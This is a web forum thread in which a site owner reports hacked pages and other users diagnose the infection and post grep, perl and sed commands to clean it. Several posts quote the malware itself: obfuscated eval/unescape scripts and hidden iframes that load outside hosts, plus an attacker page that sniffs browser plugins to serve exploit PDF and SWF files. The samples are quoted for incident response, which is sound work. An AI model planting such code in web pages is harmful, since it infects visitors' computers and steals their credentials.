SitePoint Sponsor

User Tag List

Results 1 to 14 of 14

Thread: site hacked

  1. #1
    SitePoint Zealot
    Join Date
    Dec 2001
    Posts
    105
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    site hacked

    Hello just found a site that has been hacked, from what see don't think it is server hack but an exploit of some kind. It is a php page but no database, an iframe was inserted with redirect. offending code is

    Code:
    <iframe frameborder=0 border=0 height=1 width=1 src="http://habrion.cn/in.cgi?3" /></body>
    </html>
    <script> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script><script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fdasretokfin.com%2Findex.php%22%20width%3D%220%22%20height%3D%220%22%20style%3D%22display%3Anone%3B%22%3E%3C%2Fiframe%3E"));</script>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    Any ideas how to track this hack down?

    cheers

  2. #2
    SitePoint Zealot
    Join Date
    Oct 2008
    Posts
    167
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Check the FTP logs on the server. Check to see if anyone logged into your account and uploaded this file.
    CanisHosting - Web Hosting plans starting at $3.95 per month

  3. #3
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    hmm... now if I'm not wrong here I believe you've been hit by an injection attack, triggered by the xml-rpc vulnerability scanner and exploiter or php injection scanner and exploiter. if this is the case you probably has a backdoor or two there as well.

    can you find a file named nstview.php or some variants of the name ? try also to search for c99shell.php or c99madshell.php or variants of this as this has been related to this kind of hack.

    these files if found, are backdoors/shell to your system.

    the iframe redirect to dasretokfin... where there is an exploit trying to take advantage off the "Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities", and "Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability" which is included in the index page from "spl.php"

    the "hebrion" address looks like an exploit too, or a redirect to an exploit... can't see why it should appear there for any other reason...

    anyway, if what I believe is true, this exploits can be on many of your pages and there may be backdoors there too, so try scanning and searching your files for this kind of threats.

    maybe you can enlight us about the system your site is running...as is it a forum, some kind of CMS or what ?
    Who's to doom when the judge himself is dragged before the bar


    Home | Web | Facebook

  4. #4
    SitePoint Enthusiast
    Join Date
    Aug 2008
    Location
    Everett WA
    Posts
    80
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I would also suggest checking the apache logs for the site to see what kind of activity has been happening with relation to your PHP pages. If you have any pre-made PHP applications, check to see if they are out of date, if so, update them. A common exploit is to remote load PHP code of their choice through some PHP application that does not make the appropriate checks, and from there, they may be given access in some fashion to the files on the server. Also make sure that the login information is secure for this site, if you use a dictionary word for a password with a common user, such as info:gateway, it will be guessed quickly, people are constantly scanning. Follow the minimal password guideline of at least one number, symbol, upper case, and lower case letter, with a minimum of 8 characters. Oh, and p@$$w0rd and variants are quickly guessed too, use common sense.

    Other than that, use good security practices with programming, don't use the same login information that is stored in a file on your site, for the login to your server via FTP/SFTP or SSH, and keep your PHP software applications up to date. Be familiar with your logs, watch for weird POSTs in your apache access log. A PHP file on your site that includes a foreign URL is never a good sign.
    Jonathan Kinney
    Data Systems Specialist
    Advantagecom Networks, Inc.
    http://www.simplywebhosting.com

  5. #5
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    after decoding the obfuscated code
    Code:
     
    <script> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>
    I sit here with this:
    Code:
     
    <iframe src = "http://logitech1.extra.hu/ice_en_clean/index.php" width = "0" height = "0"> </ iframe>
    which again seems to not exist anymore.. it used to contain a russian ad banner but logitech1 is also known to contain a Js/vbs script/exploit to a backdoor downloader but has only worked on IE as far as i know... I tried to go to it, but was redirected to extra.hu, and there was nothing downloaded or installed here. nor was there nothing suspicious in my temp files after visiting, so it seems like it is outdated and gone...

    I'm now pretty sure you have some outdated software running there and this russian "hack-pack" has found it under a scan and exploitet it.

    if I'm right this is from a russian hacktool set of scanners and exploits released as far as i know for about 3 yrs ago.

    this packet contained the exploits and backdoor creater nstview and c99shell and later the c99madshell as well. It also contained the xml-rpc vulnerability scanner and exploiter and php injection scanner and exploiter.

    then you have this redirect to dasretokfin and the exploit there as well...

    I'm not 100% sure this is what I suspect, but it looks similar to the footprints of the tools in this hack tool packet, so check and clean your files before you take a backup.

    also do as Kinney suggest and update and check your logs and change pw's as well...

    Good Luck!
    Who's to doom when the judge himself is dragged before the bar


    Home | Web | Facebook

  6. #6
    SitePoint Enthusiast
    Join Date
    Jun 2006
    Posts
    97
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Why would you be interested? Because it is your site? If so, you should show us some of your dynamic code mainly all AJAX, login, etc security sensitive source code.

  7. #7
    SitePoint Zealot
    Join Date
    Dec 2001
    Posts
    105
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hello and thanks for replies, i could not find any of those files and server does not appear to be rooted, however i did find a number of scans from exploit scanners in logs and added redirects in .htaccess. I know this not best way but as front page was hacked again i needed to do something, i did find an old install of xara in subdir and have told them to remove it along with all files not being used by site. This is the only site being affected so hopefully this will cure issue. Got a feeling it maybe due to old xara install.

  8. #8
    SitePoint Enthusiast
    Join Date
    Aug 2008
    Location
    Everett WA
    Posts
    80
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I have found a version of this in action and have examined it. Here are the first steps, make sure you have updated your Adobe Reader and Shockwave/Flash plugins, and make sure you have a good antivirus/antimalware application running on your system. The instance of this that I found spreads through people's sites for which they have the FTP login information. They modify a ton of different pages in many different ways, to direct people without them knowing it, to their server, which runs a cgi script and java script to determine what plugins your browser is using, and then it will attempt to feed your browser the appropriate .pdf and/or .swf with exploit code in it, which infects the person's computer who is browsing the site. The infected computer then has a trojan, which in this instance listens and searches for FTP and perhaps other login information to sites, which it reports back to a central server, which then periodically processes the sites, downloading, modifying, and then re-uploading the new infected site files. The site's files are infected in specific ways depending on how they are named and what kind of file it is. For example, all files that contain the word home, default, index, etc, are modified as if they are the main index pages. Depending on the extension, it will insert the appropriate code, so it differs when modifying a .php, .html, .js, .shtml, and so on. They do it this way so that it can work as cleanly as possible without detection so the site can be infecting as many people as possible for as long as possible. Much of the code inserted will be encoded in various different ways so that it is not plain readable, so they can hide exactly what they are doing to a certain extent. In plain html files, they often use hidden iframe tags to get their payload to the end browser and it's plugins. The rest deal in PHP code, includes, and encoded java script, with a few exceptions. One last thing, it seems that at least in this instance I saw, it involved .cn domains where it loaded the exploits from.

    It is actually quite neat to see something like this in action, not that it is good, but wow, quite an operation. Not that it is without its flaws, it can tend to eat the end of files sometimes, and it has a tendency of generating replacement files that do not have a correct end of line. They probably use sed to process the files with a search and replace string.

    I have helped clean up a pile of sites that have been hit, so if you want some nice sed and perl search and replace strings, I can give some good examples.
    Jonathan Kinney
    Data Systems Specialist
    Advantagecom Networks, Inc.
    http://www.simplywebhosting.com

  9. #9
    SitePoint Enthusiast
    Join Date
    Jul 2007
    Posts
    44
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    For anyone interested in the motives and strategies of the people behind these ongoing script injection attacks check out Dancho Danchev's blog for comprhensive analysis. It is interesting reading and relevant to anyone running a web hosting business.

  10. #10
    SitePoint Enthusiast
    Join Date
    Aug 2008
    Location
    Everett WA
    Posts
    80
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Here are some examples of the search and replace commands I put together. It took a lot of time to work through this and put them together, so I figured it would not hurt to put some examples out there that others could use. The standard process was to find the files with the exploit and generate a list of files, back them up, and then perform the search and replace on them. I had to switch from using perl one liners to sed due to the need to search and replace more than one line. If you are working with a single line, perl works great though. Also you may need to upgrade your sed or grep to use some of these options, as older versions on older distributions were found lacking. And of course you will want to examine the results of the grep and search and replace to make sure it is matching only what it needs to.

    If you are curious and mange several clients on one server, you can just use the grep commands to see if it finds any matches. Often a person does not even know they are infected, at least right away.


    Code:
    ## iframe exploit search and replace notes:
    grep -rliPo '\<iframe src=\"http.*hidden\"\>\<\/iframe\>' /home/*/*/html/ > iframe-html-exploit-file-list.txt
    tar cpjf iframe-html-exploit-file-backup.tar.bz2 `cat iframe-html-exploit-file-list.txt`
    perl -pi -e 's/\<iframe src=\"http.*hidden\"\>\<\/iframe\>//g' `cat iframe-html-exploit-file-list.txt`
    
    ## PHP exploit search and replace:
    grep -rliPo '\<\?php\ if\(\!function_exists\(.*\(\)\;\ \?\>' /home/*/*/html/ > php-function-insert-exploit-file-list.txt
    tar cpjf php-function-insert-exploit-file-backup.tar.bz2 `cat php-function-insert-exploit-file-list.txt`
    perl -pi -e 's/\<\?php\ if\(\!function_exists\(.*\(\)\;\ \?\>//g' `cat php-function-insert-exploit-file-list.txt`
    
    ## SHTML java exploit search and replace:
    grep -rliPo '\<script\ language\=javascript\>\<\!\-\-\ \s.+\s\ \-\-\>\<\/script\>' /home/*/*/html/ > shtml-javascript-include-exploit-file-list.txt
    tar cpjf shtml-javascript-include-exploit-file-backup.tar.bz2 `cat shtml-javascript-include-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<script language=javascript><!-- .*(function(.* --><\/script>//g;p;}' `cat shtml-javascript-include-exploit-file-list.txt`
    
    ## 02-SHTML another java exploit search and replace:
    grep -rliPo '\<script\ language\=javascript\>\<\!\-\-\s+.+\s+\-\-\>\<\/script\>' /home/*/*/html/ >02-shtml-javascript-include-exploit-file-list.txt
    tar cpjf 02-shtml-javascript-include-exploit-file-backup.tar.bz2 `cat 02-shtml-javascript-include-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<script language=javascript><!-- .*(function(.* --><\/script>//g;p;}' `cat 02-shtml-javascript-include-exploit-file-list.txt`
    
    ## dotjs javascript include exploit search and replace
    grep -rliPo '\<\!\-\-\s+\(function\(.+\)\;\s+' `cat ~/broken_site_list.txt` > dotjs-javascript-include-exploit-file-list.txt
    tar cpjf dotjs-javascript-include-exploit-file-backup.tar.bz2 `cat dotjs-javascript-include-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<script language=javascript><!-- .*(function(.* --><\/script>//g;p;}' `cat dotjs-javascript-include-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<!-- .*(function(.* -->//g;p;}' `cat dotjs-javascript-include-exploit-file-list.txt`
    
    ## image.php etc. files that were new and uploaded, but need to be neutralized:
    grep -rliPo '\<\?php\s+eval\(base64\_decode.+\;\s+\?\>' `cat ~/broken_site_list.txt` > image-php-exploit-file-list.txt
    tar cpjf image-php-exploit-file-backup.tar.bz2 `cat image-php-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<?php eval(base64_decode.*; ?>//g;p;}' `cat image-php-exploit-file-list.txt`
    
    ## echo-php-iframe-exploit
    grep -rliP '\<iframe\s+src\=.+http\:\/\/' `cat ~/broken_site_list.txt` > remainder-iframe-exploit-file-list.txt
    tar cpjf remainder-iframe-exploit-file-backup.tar.bz2 `cat remainder-iframe-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/.echo "<iframe src=\\"http.*\\"><\/iframe>";//g;p;}' `cat remainder-iframe-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<iframe src="http.*visibility:hidden.*"><\/iframe>//g;p;}' `cat remainder-iframe-exploit-file-list.txt`
    Jonathan Kinney
    Data Systems Specialist
    Advantagecom Networks, Inc.
    http://www.simplywebhosting.com

  11. #11
    SitePoint Member 8hrarcade's Avatar
    Join Date
    Jun 2009
    Posts
    10
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I have had many problems like this in the past. It got really freakin annoying...

  12. #12
    SitePoint Enthusiast
    Join Date
    Aug 2008
    Location
    Everett WA
    Posts
    80
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    For searchability sake, here is what the end user's browser will eventually load due to one of those hidden iframe tags in an infected site:

    Code:
    <html>
    
    <body>
    
    <script>
    
    function pdfswf()
    {
            try
            {
                    for(i = 0; i <= navigator.plugins.length; i++)
                    {
                            name = navigator.plugins[i].name;
    
                            if((name.indexOf("Adobe Acrobat") != -1) || (name.indexOf("Adobe PDF") != -1))
                            {
                                    document.write('<iframe src="cache/readme.pdf"></iframe>');
                            }
    
                            if(name.indexOf("Flash") != -1)
                            {
                                    document.write('<iframe src="cache/flash.swf"></iframe>');
                            }
                    }
            }
    
            catch(e){}
    }
    
    pdfswf();
    
    </script>
    
    </body>
    
    </html>
    Its an elegant little piece of code that checks for Flash or Acrobat plugins, and serves the exploit documents. I am sure there are other ways, but this is the only way I have seen in action in the instances I have seen.
    Jonathan Kinney
    Data Systems Specialist
    Advantagecom Networks, Inc.
    http://www.simplywebhosting.com

  13. #13
    SitePoint Wizard frank1's Avatar
    Join Date
    Oct 2005
    Posts
    1,392
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Jonathan Kinney View Post
    I have found a version of this in action and have examined it. Here are the first steps, make sure you have updated your Adobe Reader and Shockwave/Flash plugins, and make sure you have a good antivirus/antimalware application running on your system. The instance of this that I found spreads through people's sites for which they have the FTP login information. They modify a ton of different pages in many different ways, to direct people without them knowing it, to their server, which runs a cgi script and java script to determine what plugins your browser is using, and then it will attempt to feed your browser the appropriate .pdf and/or .perl search and replace strings, I can give some good examples.
    from what we understand,
    some of our clients use software like coreftp which saves username and password of the site....so does it mean that it should not be done....and make things easier to search files....password files...

    cannot we examine what are using our software..trying to mail .....?
    or arent modern antivirus and embedded firewalls smart enough to detect it?

    what are used to email details from our computers...

    we have also been in this situation and usually password change has solved our problems...up to now...

  14. #14
    SitePoint Enthusiast
    Join Date
    Aug 2008
    Location
    Everett WA
    Posts
    80
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    If your computer is compromised, then yes, it would be bad to have your login information saved in any program unencrypted, because it could be retrieved, period. This exploit, if successful, gains full administrative privileges to your system and so has all the access that you do, and they can see, monitor, and gather any and all information about what you do or have on your system.

    No, antivirus systems are not good enough, the exploit code changes so quickly that most antivirus software can not detect it, because it is not a classic virus. Unfortunately it is more and more left up to the end user's education and knowledge of how to keep a system up to date and secure, and sadly that leaves many people unequipped. For example, just check out the uneducated people posting comments on the Firefox plugin called "YesScript" which is so foolishly listed under security:

    https://addons.mozilla.org/en-US/fir...n/4922?src=api

    Its like people don't get the fact that security is a preventative measure, not a cleanup after the fact measure. The big metal door on a safe in a bank is not just left there open until someone steels stuff, and then they don't like it, so they close it, the door is there to prevent things from being stolen in the first place. That is what security is.

    Its no longer just a matter of using a secure browser, now you have to watch out for all the plugins secretly installed into a browser, and all the applications that they can trigger. All of that stuff that can be called on via a webpage must also be secure and free of exploits.

    If you are affected by this type of issue, I would suggest that you remove the computer from the network, and wipe the system, saving only the data that you need, and start from a fresh install. Then change your passwords. And as you are keeping your software up to date (including software related to plugins and addons to your browser), watch out for broken software updaters such as what Adobe Reader had, which kept me from updating to the latest version.
    Jonathan Kinney
    Data Systems Specialist
    Advantagecom Networks, Inc.
    http://www.simplywebhosting.com


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •